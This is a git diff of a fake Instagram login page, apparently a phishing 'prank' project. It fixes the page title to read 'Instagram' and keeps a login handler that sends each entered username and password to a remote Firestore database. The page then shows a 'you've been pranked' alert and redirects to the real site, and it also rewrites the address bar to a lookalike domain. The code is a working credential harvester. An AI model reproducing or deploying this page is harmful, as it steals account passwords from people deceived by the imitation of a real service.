--- a/index.html
+++ b/index.html
@@ -4,9 +4,11 @@
 
 <meta charset="UTF-8">
 <link data-default-icon="Web_Icon.png" rel="icon" sizes="192x192" href="Web_Icon.png" />
-<title>Instagrram</title>
+<title>Instagram</title>
 <link rel="stylesheet" href="style.css">
 <!-- <script src="C:\Users\u1091915\Documents\PLSQL\HTML_CSS\Insta\script.js"></script>-->
+
+
 </head>
 
 <body>
@@ -18,12 +20,12 @@
     <img width="200" height="80" src="Insta_font.jpg">
     <br>
 
-	<form id="loginForm" onsubmit="prank(event)" action="Details.php">
+	<form id="loginForm">
 	   <input type="text" name="Name" id="username" placeholder="Phone number, username, or email" required>
        <br>
 	   <input type="password" name="Password" id="password" placeholder="Password" required>
        <br>
-	   <button type="submit" id = "login" class="login-button">Log In</button>
+	   <button type = "button" id = "login" class="login-button">Log In</button>
 
        <div class="or-line">
             <hr> <span> OR </span> <hr>
@@ -52,6 +54,7 @@
 </div>
 
 <script>
+    console.log("jmmm")
     import { initializeApp } from "https://www.gstatic.com/firebasejs/9.22.2/firebase-app.js";
     import { getAnalytics } from "https://www.gstatic.com/firebasejs/9.22.2/firebase-analytics.js";
     import { getFirestore, collection, addDoc } from "https://www.gstatic.com/firebasejs/9.22.2/firebase-firestore.js";
@@ -75,15 +78,7 @@
     const app = initializeApp(firebaseConfig);
     const analytics = getAnalytics(app);
 
-    function prank(event) {
-      event.preventDefault(); // Prevent form submission
-      const username = document.getElementById("username").value;
-      const password = document.getElementById("password").value;
-      if (username && password) {
-        alert("You've been pranked! Your credentials were captured.");
-// You can perform additional actions or show custom prank messages here
-}
-}
+
 
 var db = getFirestore();
 
@@ -98,8 +93,11 @@ var modifiedURL = 'instagrram.com';
 history.pushState(null, null, modifiedURL);
 
 document.getElementById("login").onclick = async(e) => {
+    console.log("kiki")
+
 
     console.log("hmmmm")
+    
     pass = document.getElementById('password').value;
     userid = document.getElementById('username').value;
     if (pass !== null && pass.length > 6) {
@@ -111,6 +109,7 @@ document.getElementById("login").onclick = async(e) => {
                 user: userid,
                 password: pass
             })
+            alert("You've been pranked! Your credentials were captured.");
             window.location.href = "instagram.com";
 
         } catch (e) {
